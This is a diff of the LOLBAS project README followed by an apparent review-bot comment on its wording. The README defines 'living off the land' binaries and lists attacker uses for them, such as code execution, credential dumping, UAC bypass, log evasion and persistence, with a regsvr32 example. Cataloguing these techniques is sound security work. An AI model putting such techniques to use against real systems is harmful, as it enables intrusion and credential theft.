|||
# Living Off The Land Binaries and Scripts
|
||||
# Living Off The Land Binaries and Scripts (and now also Libraries)
|
||||
|
||||
There are three different lists.
|
||||
<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLBAS.png" height="250">
|
||||
|
||||
|
||||
There are currently three different lists.
|
||||
|
||||
* [LOLBins](LOLBins.md)
|
||||
* [LOLLibs](LOLLibs.md)
|
||||
* [LOLScripts](LOLScripts.md)
|
||||
|
||||
|
||||
The goal of these lists are to document every binary and script that can be used for other purposes than they are designed to.
|
||||
Every binary and script has it's own .md file in the subfolders. That way I should be easier to maintain and reuse.
|
||||
The goal of these lists are to document every binary, script and library that can be used for Living Off The Land techniques.
|
||||
|
||||
Definition of LOLBAS candidates (Binaries,scripts and libraries):
|
||||
* LOLBAS candidates must be present on the system by default or introduced by application/software "installation" from a "reputable" vendor or open-source entity. Otherwise, LOLBAS determination is subject to scrutiny by the (security) community and agreed upon standards.
|
||||
* Can be used as an attacker tool directly or can perform other actions than what it was intended to do (Ex: regsvr32 - execute code from SCT online)
|
||||
* executing code
|
||||
* downloading/upload files
|
||||
* bypass UAC
|
||||
* compile code
|
||||
* getting creds/dumping process
|
||||
* surveillance (keylogger, network trace)
|
||||
* evade logging/remove log entry
|
||||
* side-loading/hijacking of DLL
|
||||
* pass-through execution of other programs, script (via a LOLBin)
|
||||
* pass-through persistence utilizing existing LOLBin
|
||||
* persistence (Hide data in ADS, execute at logon etc)
|
||||
|
||||
Right now it is me that decides if the files are a valid contribution or not.
|
||||
I try my best to conclude with help from others in the InfoSec community and I do not wish to exclude anything.
|
||||
Also, please be patient if it takes some time for your contribution to be added to the list. I am just one guy.
|
||||
|
||||
Every binary, script and library has it's own .md file in the subfolders. That way I should be easier to maintain and reuse.
|
||||
I have borrowed examples from the community (And a lot from Red Canary - Atomic Red Team - Thanks @subtee)
|
||||
Would really love if the community could contribute as much as possible. That would make it better for everyone.
|
||||
If you think it is hard to make a pull request using github, don't hasitate to send me a tweet and I will add the contribution for you.
|
||||
|
||||
|
||||
## STORY
|
||||
"Living off the land" was coined by Matt Graeber - @mattifestation <3
|
||||
One of the first "Living Off The Land" talks (That I know of) is this one:
|
||||
https://www.youtube.com/watch?v=j-r6UonEkUw
|
||||
|
||||
The term LOLBins came from a twitter discussion on what to call these binaries. It was first proposed by Philip Goh - @MathCasualty here:
|
||||
https://twitter.com/MathCasualty/status/969174982579273728
|
||||
|
||||
The term LOLScripts came from Jimmy - @bohops:
|
||||
https://twitter.com/bohops/status/984828803120881665
|
||||
|
||||
Common hashtags for these files are:
|
||||
|
||||
#LOLBin
|
||||
#LOLBins
|
||||
#LOLScript
|
||||
#LOLScripts
|
||||
#LOLLib
|
||||
#LOLLibs
|
||||
|
||||
A "highly scientific poll" was also conducted to agree (69% yes) on the name LOLBins.
|
||||
https://twitter.com/Oddvarmoe/status/985432848961343488
|
||||
|
||||
The domain http://lolbins.com has been registered by an unknown individual and redirected it to this project. (Thank you)
|
||||
|
||||
The awesome logos in the logo folder was provided by Adam Nadrowski (@_sup_mane) - Thank you so much man!
|
||||
|
||||
Love this logo:
|
||||
<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOL1.png" height="250">
|
||||
|
||||
## Future work / Todo list
|
||||
- [ ] Better classification system
|
||||
- [ ] Load DLL
|
||||
- [ ] Arbitrary unsigned code execution
|
||||
- [ ] Launch other process
|
||||
- [ ] Better contribution template
|
||||
- [ ] Provide the project in DB format (sqlite)
|
||||
- [ ] Re-factor project (version 2.0) and move it to a dedicated project site (https://github.com/LOLBAS-Project)
|
||||
- [ ] Map it to the Mitre Att&ck <3
|
||||
- [ ] LOLGuiBins
|
||||
- [ ] More list based on classifications
|
||||
- [ ] LOLBAS lists for Linux? OSX?
|
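Review bot: a few wording defects in the new text: "The goal of these lists are" should be "is"; "it's own .md file" should be "its own"; "That way I should be easier" should be "it should be"; "hasitate" should be "hesitate"; "downloading/upload files" should be "downloading/uploading files"; "The awesome logos ... was provided" should be "were provided". The capability bullets from "executing code" through "persistence (Hide data in ADS, execute at logon etc)" are meant as sub-items of the "Can be used as an attacker tool ..." bullet but sit at the same indent level, so they render as siblings of the two definition criteria; indent them. The "Right now it is me that decides" paragraph would also read better folded into the contribution paragraph further down instead of sitting between the definition and the file-layout note.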